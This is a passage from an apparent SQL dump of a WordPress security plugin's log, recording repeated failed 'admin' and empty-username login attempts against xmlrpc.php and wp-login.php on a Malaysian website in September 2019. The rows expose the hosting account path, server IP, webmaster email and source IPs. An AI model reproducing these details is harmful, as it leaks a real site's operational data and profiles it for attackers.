empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"40370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGCDyqbKGlf1IVly7OE6QAAAUo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568768527.8564\";s:12:\"REQUEST_TIME\";s:10:\"1568768527\";}}','notice','2019-09-18 01:02:09','2019-09-18 01:02:08',18257752,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(24822,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"40123\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGCDG4SfF9g@8lNlxwntgAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568768524.7599\";s:12:\"REQUEST_TIME\";s:10:\"1568768524\";}}','notice','2019-09-18 01:02:06','2019-09-18 01:02:05',17742352,19233776,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24821,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"147.139.135.175\";s:11:\"REMOTE_PORT\";s:5:\"54916\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGA2iR0vdvYEIduPCLSFgAAAQ4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568768218.1407\";s:12:\"REQUEST_TIME\";s:10:\"1568768218\";}}','notice','2019-09-18 00:56:59','2019-09-18 00:56:58',18257752,19553672,'https://bintara.com.my/xmlrpc.php',1,0,'147.139.135.175'),(24820,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"147.139.135.175\";s:11:\"REMOTE_PORT\";s:5:\"54204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGA10QGijxhVPhG1M0FdwAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568768215.8415\";s:12:\"REQUEST_TIME\";s:10:\"1568768215\";}}','notice','2019-09-18 00:56:57','2019-09-18 00:56:56',17742928,19233808,'https://bintara.com.my/wp-login.php',1,0,'147.139.135.175'),(24819,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.184.25\";s:11:\"REMOTE_PORT\";s:5:\"56238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF-wCqbKGlf1IVly7OEFAAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767936.3013\";s:12:\"REQUEST_TIME\";s:10:\"1568767936\";}}','notice','2019-09-18 00:52:17','2019-09-18 00:52:16',18255056,19551720,'https://bintara.com.my/xmlrpc.php',1,0,'159.89.184.25'),(24818,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.184.25\";s:11:\"REMOTE_PORT\";s:5:\"54898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF-tyR0vdvYEIduPCLR-wAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767927.6349\";s:12:\"REQUEST_TIME\";s:10:\"1568767927\";}}','notice','2019-09-18 00:52:09','2019-09-18 00:52:08',17738456,19229120,'https://bintara.com.my/wp-login.php',1,0,'159.89.184.25'),(24817,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"42946\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF-II75s89pqgR69SLxmQAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767776.8588\";s:12:\"REQUEST_TIME\";s:10:\"1568767776\";}}','notice','2019-09-18 00:49:38','2019-09-18 00:49:37',18255440,19551912,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(24816,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"42594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF-HSqbKGlf1IVly7OD6wAAAUc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767773.7879\";s:12:\"REQUEST_TIME\";s:10:\"1568767773\";}}','notice','2019-09-18 00:49:35','2019-09-18 00:49:34',17741632,19232376,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(24815,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"185.166.131.146\";s:11:\"REMOTE_PORT\";s:5:\"39342\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF9m475s89pqgR69SLwqAAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767387.6009\";s:12:\"REQUEST_TIME\";s:10:\"1568767387\";}}','notice','2019-09-18 00:43:09','2019-09-18 00:43:07',18255264,19552960,'https://bintara.com.my/xmlrpc.php',1,0,'185.166.131.146'),(24814,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 